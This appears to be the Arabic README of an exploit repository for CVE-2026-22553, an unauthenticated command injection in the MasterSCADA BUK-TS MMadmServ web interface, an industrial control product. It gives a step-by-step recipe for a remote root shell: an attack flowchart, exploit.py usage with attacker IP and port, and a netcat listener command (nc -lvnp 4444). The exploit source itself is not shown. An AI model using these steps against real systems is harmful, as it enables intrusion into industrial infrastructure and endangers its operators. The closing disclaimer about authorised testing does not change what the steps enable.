
غير مصادق عليه استغلال حقن أوامر نظام التشغيل لواجهة ويب InSAT MasterSCADA BUK-TS MMadmServ. يقدم شِل عكسي بامتيازات الجذر عبر طلب HTTP POST. CVSS 9.8 حرج.
CVE-2026-22553 | CVSS 9.8 حرج | مؤلف الاستغلال: محمد إدريس بنيامر
InSAT MasterSCADA BUK-TS يعاني من ثغرة حقن أوامر نظام التشغيل بدون مصادقة في واجهة الويب MMadmServ. تسمح هذه الثغرة للمهاجمين عن بُعد بتحقيق تنفيذ أوامر كامل عن بُعد (RCE) بدون أي مصادقة.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fff
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| الخيار | الوصف |
|---|---|
target | عنوان الهدف (مثل http://ip:port) |
--lhost | عنوان IP الخاص بك (شل عكسي) |
--lport | منفذ الاستماع الخاص بك |
ابدأ مستمعًا على جهازك:
nc -lvnp 4444
قم بتشغيل أداة الاستغلال:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
احصل على شل عكسي بصلاحيات الجذر/النظام.
تم توفير أداة الاستغلال هذه لأغراض تعليمية واختبار الاختراق المصرح به فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني وقد ينتهك القوانين الدولية.
المؤلف غير مسؤول عن أي إساءة استخدام.
محمد إدريس بنيامر
قم بإعطاء نجمة ⭐ لهذا المستودع إذا وجدته مفيدًا!